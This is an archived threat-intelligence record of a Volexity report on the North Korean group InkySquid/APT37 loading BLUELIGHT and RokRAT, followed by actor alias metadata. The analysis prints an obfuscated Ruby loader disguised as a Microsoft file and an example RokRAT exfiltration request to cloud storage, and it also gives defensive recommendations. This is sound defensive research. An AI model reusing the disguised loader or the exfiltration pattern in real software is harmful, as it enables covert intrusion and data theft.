{
	"id": "299de66b-b14e-4b3f-b952-d571b6661269",
	"created_at": "2026-04-06T00:14:38.40513Z",
	"updated_at": "2026-04-10T03:38:06.536801Z",
	"deleted_at": null,
	"sha1_hash": "f7e076ed48892df5cd68575d11c4409326dd8dc1",
	"title": "North Korean BLUELIGHT Special: InkySquid Deploys RokRAT",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 564581,
	"plain_text": "North Korean BLUELIGHT Special: InkySquid Deploys RokRAT\r\nBy mindgrub\r\nPublished: 2021-08-24 · Archived: 2026-04-05 14:59:45 UTC\r\nIn a recent blog post, Volexity disclosed details on a portion of the operations by a North Korean threat actor it tracks as InkySquid. This threat actor compromised a news portal to use recently patched browser exploits to deliver a custom malware family known as BLUELIGHT.\r\nThis follow-up post describes findings from a recent investigation undertaken by Volexity in which the BLUELIGHT malware was discovered being delivered to a victim alongside RokRAT (aka DOGCALL). RokRAT is a backdoor previously attributed to use by ScarCruft/APT37, which is also known as InkySquid. It should be noted that Volexity identified some overlap between the findings discussed in this post and this Korean-language article.\r\nAnalysis\r\nVolexity is often asked to analyze systems of users frequently targeted by state-sponsored threat actors based on some tip-off or concern that the systems may be compromised. In this case, it was a system belonging to an individual who is a frequent target of North Korean threat actors. Prior to contacting Volexity, the user had run four separate, popular antivirus programs in attempts to identify and remove any malware. Despite these actions, the user was still concerned that their machine may have been infected. Despite less-than-ideal conditions for the starting analysis state, Volexity was able to identify two separate malware infections on the system, and a likely start date for the infection. However, it was not possible to confirm how it became infected, as it had been rebooted multiple times since initial infection and several weeks had passed.\r\nhttps://www.volexity.com/blog/2021/08/24/north-korean-bluelight-special-inkysquid-deploys-rokrat/\r\nPage 1 of 5\r\nThe first malware discovered was installed using a convoluted loading mechanism, where a full copy of Python 2.7 was installed into the following directory:\r\n%USERPROFILE%/Python27(64)\r\nAn encoded blob was then stored in the following location:\r\n%PROGRAMDATA%/hiddigi/msihnd\r\nA loading script written in Python was written to the following directory:\r\n%LocalAppData%/Microsoft/mdmadc/KBDBGPH1\r\nFollowing this, the attacker configured a Scheduled Task to use the Python binary to run the loading script and execute the encoded blob. The script decoded a shellcode stub at the head of the msihnd file, which is responsible for setting up a child process using the name of a randomly chosen EXE file from the “C:\\Windows\\System32” directory. The main malware was then decoded from data stored after the initial shellcode, using a single-byte XOR key of 0x74. The result of this process was that a version of the BLUELIGHT malware family would be loaded. While the sample of BLUELIGHT analyzed in the previous post used Microsoft Graph for command and control, this version used a custom Google Web App.\r\nLess than 10 minutes after deploying BLUELIGHT, the attacker installed a second malware family. The loading mechanism for this family was similar to that used for BLUELIGHT; although this time, a copy of Ruby was installed at the following path:\r\n%LOCALAPPDATA%/Microsoft/Ruby27-x64/\r\nThe attacker dropped two encoded blobs to the following locations:\r\n%PROGRAMDATA%/User-Mode Bus Enumerator/1BA76030/Shortcut_674D.info\r\n%PROGRAMDATA%/Local Kernel Debugger/18E911AC/WinSDK_4641.info\r\nA loading script, written in Ruby, was saved to the following location and set to run as a Scheduled Task:\r\n%PROGRAMDATA%/Microsoft Basic Display Driver/57D45646/Readme.io.md\r\nThe Ruby loading script was made to appear as though it were a real system file, with comments indicating it was part of the operating system. The malicious content is encoded within a URL string, as shown in the Ruby script below:\r\n# 14:21:58 27/02/2004\r\n# Copyright (c) Microsoft Corporation.All rights reserved.\r\nrequire 'base64'\r\nrequire 'fiddle/import'\r\n# Update Driver: name=Microsoft Basic Display Driver, id=289A1260\r\nurl7d37 = 'https://update.microsoft.com/driverupdate?id=K0AM3YEMjoQD7kCMxoCM2oCMwATMgwCZhVm\r\nalias UrlFilter1462 eval;\r\n# UrlFilter: id=74F51EE8\r\nUrlFilter1462(Base64.decode64(url7d37[45..-1].reverse));\r\nThe effect of this script is to reverse the content after “id=” in the URL and base64 decode it, yielding the real script’s true intent: to decrypt the previously written Shortcut_674D.info file using a simple XOR operation. After the Shortcut_674D.info file is decrypted, it is executed within a new thread. This data acts as shellcode that seeks out and decrypts an embedded blob of data using a mix of ROL and XOR operations. After decryption, an executable file remains and is then run.\r\nThe resulting executable acts as another loader for yet another embedded file. However, this loader uses the hostname of the current system to decrypt the embedded payload. Therefore, if it is run on any system other than the one intended, the malware will fail to execute. This trait illustrates that the malware is customized; it was created specifically for the exact victim system on which it was discovered.\r\nIf decryption of the payload is successful, the final payload is an instance of the RokRAT malware family with the following properties:\r\nSHA256 19ee7d139908a889d08508dd4225f2d27958ac2c8b7ff18a97507f7de8ce79bc\r\nSHA1 ff080176ab9e51ace68dbe3a56629168b41fa1fc\r\nMD5 9d2e5f9274b25740131f3b6139e3c3ce\r\nFile Type Win64 EXE\r\nCompile Time 2021:05:25 02:20:44+01:00\r\nMuch like BLUELIGHT, this malware family uses cloud services for all communications, supporting PCloud, Yandex, Dropbox, and Box for command and control. The API keys for this communication are embedded within the malware itself. The malware is able to perform a number of functions, including but not limited to the following:\r\nKeylogging and extraction of clipboard data\r\nCollection of specific filetypes\r\nDownload/execute further payloads\r\nExfiltrated data is encrypted using an RSA public key, preventing third parties from decrypting it. An example exfiltration request is below:\r\nPOST /uploadfile?path=/1\u0026filename=202106221534400000.q00\u0026nopartial=1 HTTP/1.1\r\nConnection: close\r\nContent-Type: multipart/form-data;boundary=--wwjaughalvncjwiajs--\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.8\r\nAuthorization: Bearer PpmL7Z9qHXPhLX38[TRUNCATED]kuk7HTet3AWYjwvAhuB\r\nUser-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\r\nContent-Length: 71795\r\nHost: api.pcloud.com\r\n----wwjaughalvncjwiajs--\r\nContent-Disposition: form-data; name=\"file\"; filename=\"202106221534500000.q00\"\r\nContent-Type: voice/mp3\r\n[DATA]\r\nMuch like its loader, this copy of RokRAT uses the victim’s hostname for decryption of important strings; it will fail to execute properly if the correct hostname is not present on the machine on which it is run. Additionally, strings within the malware referenced specific file paths that resided on the victim’s system. Presumably these paths were discovered by the attacker while running commands using BLUELIGHT, meaning the sample was compiled “live” following initial reconnaissance on the victim’s system.\r\nConclusion\r\nRokRAT is a closed-source malware family believed to be used exclusively by the North Korean APT37 threat actor, which Volexity tracks as InkySquid. The threat actor has attracted little public attention in the last year and a half. In this case, Volexity was able to tie the new BLUELIGHT malware family observed in the incident described in the previous post to APT37 based on the use of RokRAT malware, since they were observed being deployed sequentially during the intrusion.\r\nBoth the BLUELIGHT malware family and RokRAT use cloud services for command and control, making network-based detection more difficult. Additionally, while the installation of full copies of scripting languages such as Ruby and Python is noisy, they are cleverly used to obfuscate the actual malware which remains encoded on disk and is only truly visible in memory.\r\nThe infected user attempted to scan their machine with four different antivirus programs prior to Volexity’s investigation. None detected the presence of either the RokRAT or BLUELIGHT malware families, showing the effectiveness of these techniques to load these malware families to evade detection.\r\nTo prevent similar attacks from being effective against your organization, Volexity recommends the following:\r\nIf enterprise users do not require access to cloud storage resources, consider blocking them as they are difficult to detect from a command-and-control perspective.\r\nConsider monitoring for and alerting on new scheduled tasks containing unusual arguments, particularly scripting language-based scheduled tasks.\r\nTo prevent these specific attacks from being successful:\r\nUse the YARA rules provided here to identify related malware.\r\nBlock the Google App domain “636478154616-bt8kmnrg1l6oml3ipv7ifc6bck0in18h.apps.googleusercontent.com”.\r\nSource: https://www.volexity.com/blog/2021/08/24/north-korean-bluelight-special-inkysquid-deploys-rokrat/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"MITRE",
		"Malpedia"
	],
	"references": [
		"https://www.volexity.com/blog/2021/08/24/north-korean-bluelight-special-inkysquid-deploys-rokrat/"
	],
	"report_names": [
		"north-korean-bluelight-special-inkysquid-deploys-rokrat"
	],
	"threat_actors": [
		{
			"id": "6f30fd35-b1c9-43c4-9137-2f61cd5f031e",
			"created_at": "2025-08-07T02:03:25.082908Z",
			"updated_at": "2026-04-10T02:00:03.744649Z",
			"deleted_at": null,
			"main_name": "NICKEL FOXCROFT",
			"aliases": [
				"APT37 ",
				"ATK4 ",
				"Group 123 ",
				"InkySquid ",
				"Moldy Pisces ",
				"Operation Daybreak ",
				"Operaton Erebus ",
				"RICOCHET CHOLLIMA ",
				"Reaper ",
				"ScarCruft ",
				"TA-RedAnt ",
				"Venus 121 "
			],
			"source_name": "Secureworks:NICKEL FOXCROFT",
			"tools": [
				"Bluelight",
				"Chinotto",
				"GOLDBACKDOOR",
				"KevDroid",
				"KoSpy",
				"PoorWeb",
				"ROKRAT",
				"final1stpy"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "bbe36874-34b7-4bfb-b38b-84a00b07042e",
			"created_at": "2022-10-25T15:50:23.375277Z",
			"updated_at": "2026-04-10T02:00:05.327922Z",
			"deleted_at": null,
			"main_name": "APT37",
			"aliases": [
				"APT37",
				"InkySquid",
				"ScarCruft",
				"Group123",
				"TEMP.Reaper",
				"Ricochet Chollima"
			],
			"source_name": "MITRE:APT37",
			"tools": [
				"BLUELIGHT",
				"CORALDECK",
				"KARAE",
				"SLOWDRIFT",
				"ROKRAT",
				"SHUTTERSPEED",
				"POORAIM",
				"HAPPYWORK",
				"Final1stspy",
				"Cobalt Strike",
				"NavRAT",
				"DOGCALL",
				"WINERACK"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "552ff939-52c3-421b-b6c9-749cbc21a794",
			"created_at": "2023-01-06T13:46:38.742547Z",
			"updated_at": "2026-04-10T02:00:03.08515Z",
			"deleted_at": null,
			"main_name": "APT37",
			"aliases": [
				"Operation Daybreak",
				"Red Eyes",
				"ScarCruft",
				"G0067",
				"Group123",
				"Reaper Group",
				"Ricochet Chollima",
				"ATK4",
				"APT 37",
				"Operation Erebus",
				"Moldy Pisces",
				"APT-C-28",
				"Group 123",
				"InkySquid",
				"Venus 121"
			],
			"source_name": "MISPGALAXY:APT37",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "9b02c527-5077-489e-9a80-5d88947fddab",
			"created_at": "2022-10-25T16:07:24.103499Z",
			"updated_at": "2026-04-10T02:00:04.867181Z",
			"deleted_at": null,
			"main_name": "Reaper",
			"aliases": [
				"APT 37",
				"ATK 4",
				"Cerium",
				"Crooked Pisces",
				"G0067",
				"Geumseong121",
				"Group 123",
				"ITG10",
				"InkySquid",
				"Moldy Pisces",
				"Opal Sleet",
				"Operation Are You Happy?",
				"Operation Battle Cruiser",
				"Operation Black Banner",
				"Operation Daybreak",
				"Operation Dragon messenger",
				"Operation Erebus",
				"Operation Evil New Year",
				"Operation Evil New Year 2018",
				"Operation Fractured Block",
				"Operation Fractured Statue",
				"Operation FreeMilk",
				"Operation Golden Bird",
				"Operation Golden Time",
				"Operation High Expert",
				"Operation Holiday Wiper",
				"Operation Korean Sword",
				"Operation North Korean Human Right",
				"Operation Onezero",
				"Operation Rocket Man",
				"Operation SHROUDED#SLEEP",
				"Operation STARK#MULE",
				"Operation STIFF#BIZON",
				"Operation Spy Cloud",
				"Operation Star Cruiser",
				"Operation ToyBox Story",
				"Osmium",
				"Red Eyes",
				"Ricochet Chollima",
				"Ruby Sleet",
				"ScarCruft",
				"TA-RedAnt",
				"TEMP.Reaper",
				"Venus 121"
			],
			"source_name": "ETDA:Reaper",
			"tools": [
				"Agentemis",
				"BLUELIGHT",
				"Backdoor.APT.POORAIM",
				"CARROTBALL",
				"CARROTBAT",
				"CORALDECK",
				"Cobalt Strike",
				"CobaltStrike",
				"DOGCALL",
				"Erebus",
				"Exploit.APT.RICECURRY",
				"Final1stSpy",
				"Freenki Loader",
				"GELCAPSULE",
				"GOLDBACKDOOR",
				"GreezeBackdoor",
				"HAPPYWORK",
				"JinhoSpy",
				"KARAE",
				"KevDroid",
				"Konni",
				"MILKDROP",
				"N1stAgent",
				"NavRAT",
				"Nokki",
				"Oceansalt",
				"POORAIM",
				"PoohMilk",
				"PoohMilk Loader",
				"RICECURRY",
				"RUHAPPY",
				"RokRAT",
				"SHUTTERSPEED",
				"SLOWDRIFT",
				"SOUNDWAVE",
				"SYSCON",
				"Sanny",
				"ScarCruft",
				"StarCruft",
				"Syscon",
				"VeilShell",
				"WINERACK",
				"ZUMKONG",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434478,
	"ts_updated_at": 1775792286,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f7e076ed48892df5cd68575d11c4409326dd8dc1.pdf",
		"text": "https://archive.orkl.eu/f7e076ed48892df5cd68575d11c4409326dd8dc1.txt",
		"img": "https://archive.orkl.eu/f7e076ed48892df5cd68575d11c4409326dd8dc1.jpg"
	}
}